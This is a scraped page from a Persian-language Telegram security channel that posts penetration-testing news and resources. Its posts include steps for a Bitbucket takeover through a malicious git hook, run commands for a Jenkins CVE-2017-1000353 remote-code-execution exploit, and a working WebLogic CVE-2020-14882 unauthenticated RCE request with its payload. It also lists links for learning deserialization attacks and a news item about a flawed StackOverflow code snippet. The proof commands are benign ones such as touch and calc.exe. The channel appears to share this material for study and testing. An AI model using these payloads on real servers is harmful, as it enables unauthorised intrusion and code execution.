امنیت اطلاعات
851 subscribers
2.38K photos
153 videos
156 files
2.58K links
آخرین اخبار هک، ابزارها و روش های تست نفوذ را در این کانال دنبال کنید

بخش انگلیسی :
https://t.iss.one/sec_nerd_en


برای عضویت در گروه پیام بدید:
@rect00
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
How to gain control of #Bitbucket with a TAR archive:
1. An attacker with permissions clones a repository from Bitbucket
2. He uploads a malicious TAR archive as an attachment
3. The import of the archive is triggered
4. After the import of the archive, the malicious git hook is dropped to the repository
5. He creates, adds and commits a file to the repository
6. After pushing, the malicious Git hook is being executed and sensitive data is compromised.


#web
#java
#pentest


@sec_nerd
CVE-2017-1000353-1.1-SNAPSHOT-all.jar
1.3 MB
اکسپلویت اجرای دستور از راه دور بر روی Jenkins


java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"


python3 https://exploit.py https://ip:8080 jenkins_poc.se


https://github.com/vulhub/CVE-2017-1000353



فیلم :

https://asciinema.org/a/pB9D79yD8GVFQYYRKtW88hqm8


#jenkins
#java
#exploit
#rce


@sec_nerd
یک کد جاوا که در پاسخ به یک سوال در stackoverflow منتشر شده بود و در بیش از ۶ هزار پروژه ی گیت هاب مورد استفاده قرار گرفته است، دچار مشکل امنیتی است!
نویسنده ی این کد که یکی از کاربران عالی رتبه در وبسایت stackoverflow است پس از خواندن مقاله ای که سال قبل منتشر شد، متوجه این موضوع گردید و کد را در وبلاگ شخصی خود اصلاح نمود.


https://www.zdnet.com/article/the-most-copied-stackoverflow-java-code-snippet-contains-a-bug/



#news
#dev
#java


@sec_nerd
برای یادگیری حملات deserialization


کلیات:
0️⃣https://blog.detectify.com/2018/03/21/owasp-top-10-insecure-deserialization/


جاوا:
0️⃣https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
1️⃣https://www.studytonight.com/java/serialization-and-deserialization.php

پیاده سازی حملات در burp برای جاوا:
0️⃣https://blog.netspi.com/java-deserialization-attacks-burp/
1️⃣https://github.com/PortSwigger/java-serial-killer
2️⃣https://github.com/summitt/burp-ysoserial

نمونه جاوایی:
0️⃣https://medium.com/abn-amro-red-team/java-deserialization-from-discovery-to-reverse-shell-on-limited-environments-2e7b4e14fbef

دات نت و ریموتینگ در باینری:
0️⃣https://github.com/tyranid/ExploitRemotingService

دات نت و soap:
0️⃣https://github.com/nccgroup/VulnerableDotNetHTTPRemoting


دات نت بصورت عمومی:
0️⃣https://github.com/pwntester/ysoserial.net/blob/master/README.md

php:
https://nickbloor.co.uk/2018/02/28/popping-wordpress/


نمونه برای php:
0️⃣https://blog.checkpoint.com/wp-content/uploads/2016/08/Exploiting-PHP-7-unserialize-Report-160826.pdf


دو نمونه برای nodejs:
0️⃣https://medium.com/bugbountywriteup/celestial-a-node-js-deserialization-hackthebox-walk-through-c71a4da14eaa
1️⃣https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/


پایتون:
0️⃣https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
1️⃣https://docs.python.org/3/library/pickle.html

اپلیکیشن آسیب پذیری پایتونی:
0️⃣https://github.com/TheBlusky/pickle-prick

نمونه برای پایتون:
0️⃣https://dan.lousqui.fr/explaining-and-exploiting-deserialization-vulnerability-with-python-en.html
1️⃣https://www.journaldev.com/15638/python-pickle-example

چیت شیت:
0️⃣https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html


credits:soroush dalili, Nishith K


#deserialization
#java #dotnet
#php #python #burpsuite #writeup #web #pentest


@sec_nerd
👍1
مجموعه اکسپلویت های ManageEngine

https://github.com/patois/zohocorp_dc


#zoho
#poc
#java

@sec_nerd
آسیب پذیری RCE در weblogic
بدون نیاز به احراز هویت

CVE-2020–14882

https://x.x.x.x:7001/console/images/%252E%252E%252Fconsole.portal

POST:

_nfpb=true&_pageLabel=&handle=https://com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22)


https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf

#weblogic
#rce
#java


@sec_nerd